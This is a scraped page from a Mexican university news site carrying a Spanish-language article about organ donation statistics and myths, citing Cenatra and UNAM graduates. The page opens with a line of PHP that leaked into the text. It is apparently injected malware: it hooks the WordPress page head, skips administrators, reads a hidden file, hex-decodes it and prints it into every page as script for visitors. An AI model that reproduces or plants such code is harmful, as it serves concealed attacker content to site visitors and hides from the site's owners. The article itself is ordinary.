if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } En México, tres de cada mil personas son aptas para donar: UNAM – La Opinión Universitaria La Opinión Universitaria
Menu

En México, tres de cada mil personas son aptas para donar: UNAM

 

Tres de cada mil personas en México fallecen en circunstancias que podrían dar lugar a una donación y diariamente mueren 20 personas en espera de un trasplante, (CENATRA) según datos del Centro Nacional de Trasplantes (Cenatra).

 

Egresadas de la Facultad de Medicina de la Universidad Nacional Autónoma de México (UNAM) aseguraron que más de 21 mil 800 pacientes están en espera de donaciones.

 

Nancy Monterrosa Galindo, Karina Matías Zenón y Berenice Reyes Aguilar, también señalaron los mitos de la donación y que afecta la confianza de la mismo. Por ejemplo, el tráfico de órganos: “Es necesario un proceso en hospitales que requieren dos licencias especializadas, altamente equipados”, aseveraron.

 

Asimismo, las especialistas confirmaron que la donación cadavérica es autorizada únicamente por el donador o su familia.

 

Por ejemplo, la Generalitat de Catalunya estableció que el proceso es adecuado cuando es por muerte encefálica o bien por fallo en las funciones cardiorrespiratorias.

 

Las investigadoras de la UNAM también destacaron que el trámite es gratuito y se contempla a todos por igual.

  • No comments

    Deja una respuesta

    Tweets recientes